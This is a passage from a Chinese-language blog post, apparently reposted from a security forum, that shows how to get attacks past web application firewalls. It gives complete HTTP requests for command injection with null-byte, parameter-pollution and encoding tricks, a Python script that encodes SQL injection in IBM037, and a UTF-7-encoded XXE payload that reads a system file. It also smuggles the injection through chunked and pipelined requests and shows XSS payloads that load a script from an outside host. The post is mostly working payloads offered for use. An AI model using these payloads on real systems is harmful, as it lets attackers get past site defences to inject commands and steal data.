    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • ParamObfuscation_%00

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?%00id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1

HPP

对已有参数进行赋值,参数污染

  • 原始攻击

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • HPP.First_test(赋值test)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?id=;netstat%20-ant&id=test&id=test&id=test HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • HPP.Last_test

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?id=test&id=test&id=test&id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1

SpaceEncoding

对空格进行编码

  • 原始攻击
1
2
3
4
5
6
7
8
9
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
  • URL编码

  • %u编码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    GET /get/?id=;netstat%u0000-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
    Content-Length: 6
  • Double URL

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    GET /get/?id=;netstat%2500-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
    Content-Length: 6
  • Double Double

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    GET /get/?id=;netstat%25%30%30-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
    Content-Length: 6
  • HEX

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    GET /get/?id=;netstatx00-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
    Content-Length: 6

绕过实战

字符编码绕过WAF

在进行测试时候发现下面这段请求被拦截,很明显带有注入特征

1
2
3
4
5
6
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--

我们使用下面的编码技术进行编码绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import urllib

def paramEncode(params="", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
result = ""
equalSign = "="
ampersand = "&"
if encodeEqualSign:
equalSign = equalSign.encode(charset)
if encodeAmpersand:
ampersand = ampersand.encode(charset)
params_list = params.split("&")
for param_pair in params_list:
param, value = param_pair.split("=")
if urldecodeInput:
param = urllib.unquote(param).decode('utf8')
value = urllib.unquote(value).decode('utf8')
param = param.encode(charset)
value = value.encode(charset)
if urlencodeOutput:
param = urllib.quote_plus(param)
value = urllib.quote_plus(value)
if result:
result += ampersand
result += param + equalSign + value
return result

# for IIS
print paramEncode("input1='union all select * from users--")

# prints %89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

编码后变成下面这段请求,可以成功进行bypass

1
2
3
4
5
6
POST /sample.aspx?%89%95%97%A4%A3%F0=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
目标 Post(application/x-www-form-urlencoded) 【支持得编码格式,我们可以根据这些不常见得编码格式绕过各种waf】
Nginx,uWSGI-Django-Python3 IBM037,IBM500,cp875,IBM1026,IBM273
Nginx,uWSGI-Django-Python2 IBM037,IBM500,cp875,IBM1026,utf-16,utf-32,utf-32BE,IBM424
Apache-TOMCAT8-JVM1.8-JSP IBM037,IBM500,IBM870,cp875,IBM1026,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,utf-16,utf-32,utf-32BE,IBM273,IBM277,IBM278,IBM280, IBM284,IBM285,IBM290,IBM297,IBM420,IBM424,IBM-Thai,IBM871,cp1025
Apache-TOMCAT7-JVM1.6-JSP IBM037,IBM500,IBM870,cp875,IBM1026,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,utf-16,utf-32,utf-32BE,IBM273,IBM277,IBM278,IBM280, IBM284,IBM285,IBM297,IBM420,IBM424,IBM-Thai,IBM871,cp1025
Apache -PHP5(mod_php和FastCGI) None
IIS8-PHP7.1-FastCGI None
IIS6、7.5、8、10 -ASP经典 None
IIS6、7.5、8、10 -ASPX(v4.x) IBM037,IBM500,IBM870,cp875,IBM1026,IBM01047,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,utf-16,unicodeFFFE,utf-32,utf-32BE,IBM273,IBM277, IBM278,IBM280,IBM284,IBM285,IBM290,IBM297,IBM420,IBM423,IBM424,x-EBCDIC-KoreanExtended,IBM-Thai,IBM871,IBM880,IBM905,IBM00924,cp1025

编码绕过WAF

在xxe攻击中,以下攻击被WAF拦截

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: text/xml; charset=UTF-8
Content-Length: 228
Connection: close
Cookie: security_level=0; PHPSESSID=605bac73f50d32d09e96fd20a3df17e8

<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE copyright[
<!ENTITY test SYSTEM "/etc/password">
]>

<reset>
<login>&test;</login>
<secret>login</secret>
</reset>

对关键payload进行utf-7编码,成功绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: text/xml; charset=UTF-8
Content-Length: 228
Connection: close
Cookie: security_level=0; PHPSESSID=605bac73f50d32d09e96fd20a3df17e8

<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE copyright[
+ADwAIQBFAE4AVABJAFQAWQAgAHQ-e+AHMAdAAgAFMAWQBTAFQARQBNACAAIAAiAC8-e+AHQAYwAvAHAAYQBzAHMAdwBvAHI-d+ACIAPg-
]>

<reset>
<login>&test;</login>
<secret>login</secret>
</reset>

Chunked 绕过WAF

在进行测试时候发现下面这段请求被拦截,很明显带有注入特征

1
2
3
4
5
6
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--

在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码。这时,post请求报文中的数据部分需要改为用一系列分块来传输。每个分块包含十六进制的长度值和数据,长度值独占一行,长度不包括它结尾的,也不包括分块数据结尾的,且最后需要用0独占一行表示结束。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 110
Transfer-Encoding: chunked

5;
input
4;
1='u
5;
nion
4;
all
5;
selec
4;
t *
4;
from
5;
user
3;
s--
0

pipline绕过WAF

原始请求带有明显特征被拦截

1
2
GET /sample.aspx?input0=something&input1='union+all+select+*+from+users-- HTTP/1.1
HOST: victim.com

http协议是由tcp协议封装而来,当浏览器发起一个http请求时,浏览器先和服务器建立起连接tcp连接,然后发送http数据包,其中包含了一个Connection字段,一般值为close,apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大,超过一个http包容量,需要分多次发送时,值会变成keep-alive,即本次发起的http请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。 下面请求包可能存在绕过:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive


GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive


GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

GET /sample.aspx?input0=something&input1='union+all+select+*+from+users-- HTTP/1.1
HOST: victim.com

xss编码绕过WAF

原始请求带有明显特征被拦截

1
2
3
GET /192.168.3.108/Less-1/index.php?id=<svg/onload=alert()>
HTTP/1.1
HOST: victim.com

对关键payload进行unciode编码,成功绕过

1
2
3
4
GET //192.168.3.108/Less-1/index.php?id=%3Cmarquee%20onstart=\u0070r\u06f\u006dpt()%3E HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

或者对关键payload进行url编码

1
2
3
4
GET //192.168.3.108/Less-1/index.php?id=<img/%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09/src=x /onerror=alert(1)>  HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

marquee标签构造XSS站点 bypass 安全狗

1
2
3
4
GET 192.168.3.108/Less-1/index.php?id=%3Cmarquee%20style=%22opacity:%200%22%20behavior=%22alternate%22%20onbounce=%22document.body.appendChild(document.createElement(%27scrip\x74%27)).src=`https://xss.com/1`%22%3E1  HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

img标签构造XSS站点 bypass 安全狗

1
2
3
4
GET 192.168.3.108/Less-1/index.php?id=<img/%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09/src=x /onerror=document.body.appendChild(document.createElement('scrip\x74')).src=`https://xss.com/`> HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

本人翻译链接 https://github.com/0xInfection/Awesome-WAF 在原有得翻译基础上加上自己的思想,已经bypasss案例

转自:https://www.t00ls.net/thread-53335-1-1.html

-------------本文结束感谢您的阅读-------------